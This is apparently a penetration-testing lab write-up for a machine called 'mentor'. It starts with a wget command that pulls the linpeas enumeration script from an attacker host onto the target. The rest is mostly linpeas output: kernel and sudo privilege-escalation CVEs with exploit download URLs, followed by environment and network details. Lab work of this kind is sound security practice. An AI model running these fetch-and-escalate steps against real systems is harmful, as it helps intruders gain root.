PEAS


svc@mentor:~$ wget -q http://10.10.14.11/linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete over HTTP

Executing PEAS

CVEs


╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: probable
   Tags: [ ubuntu=(22.04) ]{kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Path & Environment Variables


╔══════════╣ Environment
 Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=svc
SSH_CLIENT=10.10.14.11 39592 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/svc
SSH_TTY=/dev/pts/0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
LOGNAME=svc
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=2
PATH=/home/svc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
ls_colors=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/svc
SSH_CONNECTION=10.10.14.11 39592 10.10.11.193 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null

Containers


Services


╔══════════╣ D-Bus Service Objects list
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                           PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                           765 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
:1.1                           766 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -
:1.10                          910 snapd           root             :1.10         snapd.service               -       -
:1.2                           592 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.3                           908 polkitd         root             :1.3          polkit.service              -       -
:1.4                             1 systemd         root             :1.4          init.scope                  -       -
:1.40                         2585 systemd         svc              :1.40         user@1001.service           -       -
:1.5                           912 udisksd         root             :1.5          udisks2.service             -       -
:1.50                         9765 busctl          svc              :1.50         session-2.scope             2       -
:1.6                           923 ModemManager    root             :1.6          ModemManager.service        -       -
:1.7                           911 systemd-logind  root             :1.7          systemd-logind.service      -       -
:1.9                           906 networkd-dispat root             :1.9          networkd-dispatcher.service -       -
com.ubuntu.SoftwareProperties    - -               -                (activatable) -                           -       -
org.freedesktop.DBus             1 systemd         root             -             init.scope                  -       -
org.freedesktop.ModemManager1  923 ModemManager    root             :1.6          ModemManager.service        -       -
org.freedesktop.PackageKit       - -               -                (activatable) -                           -       -
org.freedesktop.PolicyKit1     908 polkitd         root             :1.3          polkit.service              -       -
org.freedesktop.UDisks2        912 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower           - -               -                (activatable) -                           -       -
org.freedesktop.bolt             - -               -                (activatable) -                           -       -
org.freedesktop.fwupd            - -               -                (activatable) -                           -       -
org.freedesktop.hostname1        - -               -                (activatable) -                           -       -
org.freedesktop.locale1          - -               -                (activatable) -                           -       -
org.freedesktop.login1         911 systemd-logind  root             :1.7          systemd-logind.service      -       -
org.freedesktop.network1       592 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1       765 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
org.freedesktop.systemd1         1 systemd         root             :1.4          init.scope                  -       -
org.freedesktop.thermald         - -               -                (activatable) -                           -       -
org.freedesktop.timedate1        - -               -                (activatable) -                           -       -
org.freedesktop.timesync1      766 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -

Hosts


Networks


╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-028c7a43f929: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.20.0.1  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:05:24:4c:de  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-24ddaa1f3b47: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:91:6d:19:94  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-3d63c18e314d: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.21.0.1  netmask 255.255.0.0  broadcast 172.21.255.255
        ether 02:42:50:81:fe:3b  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-7d5c72654da7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.0.1  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::42:1cff:fefa:2974  prefixlen 64  scopeid 0x20<link>
        ether 02:42:1c:fa:29:74  txqueuelen 0  (Ethernet)
        RX packets 99024  bytes 8189199 (8.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 91802  bytes 16644600 (16.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-a8a89c3bf6ff: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:39:6b:f2:5a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:11:63:61:ef  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.193  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:d2:5d  txqueuelen 1000  (Ethernet)
        RX packets 84838  bytes 20297801 (20.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 88538  bytes 9041440 (9.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2830  bytes 201342 (201.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2830  bytes 201342 (201.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth1fbf3a9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e007:5dff:fe58:a035  prefixlen 64  scopeid 0x20<link>
        ether e2:07:5d:58:a0:35  txqueuelen 0  (Ethernet)
        RX packets 109  bytes 17889 (17.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 174  bytes 15773 (15.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth79ba3f3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c73:30ff:fe0d:6d10  prefixlen 64  scopeid 0x20<link>
        ether 0e:73:30:0d:6d:10  txqueuelen 0  (Ethernet)
        RX packets 6  bytes 308 (308.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 1995 (1.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethda9f088: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::81f:24ff:fe8c:3447  prefixlen 64  scopeid 0x20<link>
        ether 0a:1f:24:8c:34:47  txqueuelen 0  (Ethernet)
        RX packets 98909  bytes 9557338 (9.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 91663  bytes 16631594 (16.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

NICs

GPG


Installed Programs


Compilers


MySQL


Nginx


Apache


SSH


SNMP


.sh files


Interesting Files


/opt